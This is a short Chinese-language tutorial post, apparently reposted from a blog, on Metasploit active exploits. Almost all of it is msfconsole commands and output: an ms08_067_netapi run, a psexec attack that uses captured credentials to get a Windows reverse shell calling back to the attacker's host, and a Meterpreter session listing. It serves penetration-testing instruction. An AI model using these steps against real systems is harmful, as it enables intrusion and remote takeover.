标签:shel sys 模块 例子 art erp ESS xpl pre
主动漏洞将利用特定的主机,运行直至完成,然后退出。
msf exploit(ms08_067_netapi) > exploit -j [*] Exploit running as background job 0. msf exploit(ms08_067_netapi) >
例子:
以下示例利用先前获取的一组凭据来利用并获得目标系统上的反向shell。
msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.1.100 RHOST => 192.168.1.100 msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(psexec) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf exploit(psexec) > set LPORT 4444 LPORT => 4444 msf exploit(psexec) > set SMBUSER victim SMBUSER => victim msf exploit(psexec) > set SMBPASS s3cr3t SMBPASS => s3cr3t msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started reverse handler [*] Authenticating as user ‘victim‘... [*] Uploading payload... [*] Created \hikmEeEM.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \hikmEeEM.exe... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
msf exploit(ani_loadimage_chunksize) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444 msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
标签:shel sys 模块 例子 art erp ESS xpl pre
原文地址:https://www.cnblogs.com/ssw6/p/12123001.html